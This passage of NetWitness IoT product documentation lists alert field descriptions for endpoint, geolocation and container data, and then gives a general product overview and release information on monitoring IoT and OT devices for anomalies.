ipAddress IP address used by the last endpoint falling in this endpoint category.
dnsName DNS name of the last endpoint falling in this endpoint category. Only available for external endpoints (endpoints not on the local network). May not be present.
port Destination port used in communicating with the last endpoint falling in this endpoint category. If isOutbound is true, this is a destination port that the endpoint is listening on. If isOutbound is false, this is the destination port that the container in meta.container is listening on. Generally present except for protocols that don’t use ports such as ICMP.
risk Risk description from Live Connect for the last endpoint falling in this endpoint category. May not be present.
riskScore Risk score from Live Connect for the last endpoint falling in this endpoint category. May not be present.
countryCode ISO 2 digit country code of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
country Country name of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
continentCode 2 digit continent code of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
continent Continent name of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
subdivisionCode Subdivision code of the last endpoint falling in this endpoint category. A subdivision is equivalent to a province or state or other region within a country. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
subdivision Subdivision name of the last endpoint falling in this endpoint category. A subdivision is equivalent to a province or state or other region within a country. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
city City name of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
latitude Latitude of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
longitude Longitude of the last endpoint falling in this endpoint category. Only applicable for external IP adddresses for which a geoIP location lookup was possible. May not be present.
isContainer Boolean value. True if the last endpoint falling in this endpoint category is a container running on the same host. False otherwise. Always present.
containerId Docker id of the container corresponding to the last endpoint falling in this endpoint category. Only present if isContainer is true.
containerName Docker name of the container corresponding to the last endpoint falling in this endpoint category. Only present if isContainer is true.
containerImage Docker image name of the container corresponding to the last endpoint falling in this endpoint category. Only present if isContainer is true.
isLocalhost Boolean value. True if the last endpoint falling in this endpoint category is a service running on the localhost, but is not a container. False otherwise. Always present.
isSiteLocal Boolean value. True if the last endpoint falling in this endpoint category is a remote endpoint on the local network. False otherwise. Always present.
isExternal Boolean value. True if the last endpoint falling in this endpoint category is a remote endpoint on the external (public) network. False otherwise. Always present.

meta.processProfile field descriptions

If present, this field contains a description of the specific process that triggered this alert. Refer to the description under meta.container.processProfiles.

meta.events field descriptions

If present, this field contains a subset of events in meta.container.events proximate to when this alert was triggered. Refer to the description under meta.container.events.

4 - How NetWitness IoT Protects

Secure your IoT infrastructure

Overview

NetWitness IoT provides complete visibility into your connected IoT environment. NetWitness IoT enables organizations to extend their Security Operation Center (SOC) visibility beyond IT and into IoT and OT (Operational Technology). NetWitness IoT provides the ability to monitor and detect threats end-to-end. For example, an attack initiated from the IT systems and laterally moved to the OT systems can be easily detected. The analysts can get visibility into the complete spectrum of attacks on the entire environment. NetWitness IoT is part of NetWitness portfolio and seamlessly integrates with NetWitness Platform for extending SOC visibility into IoT/OT.

How it Works?

NetWitness IoT detects threats and anomalies in your IoT infrastructure and provides the following additional capabilities:

  • Visibility across edge and IoT devices. Billions IoT devices are deployed every year, including sensors, robots, cameras, meters and more. NetWitness IoT provides visibility into this important and growing infrastructure.
  • Use of latest technology along with advanced threat intelligence to quickly identify when IoT devices are compromised or detect any anomalous behavior.
  • Rich visualization and reporting capabilities enable everyone from operations managers to security analysts to efficiently investigate anomalous activity. Full meta and drill-down capabilities help you focus on risks, not noise.
  • Integration with multiple IoT platforms. IoT devices and protocols are known for their complex behavior. NetWitness IoT integrates with leading IoT management platforms and SIEMs using standard mechanisms (JSON, CEF). This capability helps you easily add advanced security to existing deployments. In addition to NetWitness Platform you can also integrate with other security tools using standard protocols.

IoT Edge Ecosystem Partners

NetWitness IoT is part of a growing ecosystem of Edge IoT leaders. These RSA Ready certified products and partners help organizations around the globe analyze, plan, design, manage, and operate IoT systems of every size and type. NetWitness IoT provides a layer of RSA-quality security monitoring, to protect these critical assets and enable valuable innovation.

For partner details and contact information, please visit the RSA Ready site and select NetWitness IoT.

5 - Release Information

Provides information about release informations and new enhancements.

Release Information: Introduction to NetWitness IoT

NetWitness, an RSA business (@RSAsecurity), a globally trusted partner for some of the world’s largest and most security sensitive organizations, introduces NetWitness IoT, a SaaS-native solution that delivers visibility across an organization’s critical infrastructures, including their Internet of things (IoT) and operational technology (OT) systems. NetWitness IoT provides enterprises with security monitoring for disparate IoT and OT devices at scale, by monitoring gateways, servers, and the attached devices for behavioral anomalies to produce focused and actionable alerts.

Visibility across edge and IoT devices

There are billions of IoT devices deployed by enterprises, including sensors, robots, cameras, meters and more. NetWitness IoT provides visibility into this important and growing component of your infrastructure.

NetWitness IoT detects threats to IoT and edge devices using advanced behavior analytics. The cloud service identifies anomalies and indicators of compromise and presents alerts in a modern user interface with rich data and response tools.

Extending SOC visibility

NetWitness IoT seamlessly integrates with NetWitess platform and provides a unified view for the security staff to monitor the IT and IoT environments. Additionally, NetWitness IoT integrates with leading IT security monitoring tools from other vendors so you can more easily extend the existing security operation deployments.

Machine learning and behavioral alerting

The wide range of complex functions performed by IoT devices makes it hard for security teams to spot anomalous behavior. NetWitness IoT applies advanced machine learning and behavior analytics, to quickly identify instances where devices could be compromised.

Dashboard and investigations

Rich visualization and reporting capabilities enable everyone from operations managers to security analysts to efficiently investigate anomalous activity. Full meta and drill-down capabilities help you focus on risks, not noise.

Integration with multiple IoT platforms

IoT devices and protocols are famously complex. NetWitness IoT integrates with leading IoT management platforms from other vendors so you can more easily add advanced security to existing deployments.

IoT Edge Ecosystem Partners

NetWitness IoT is part of a growing ecosystem of Edge IoT leaders. These RSA Ready certified products and partners help organizations around the globe analyze, plan, design, manage, and operate IoT systems of every size and type. NetWitness IoT provides a layer of RSA-quality security monitoring, to protect these critical assets and enable valuable innovation.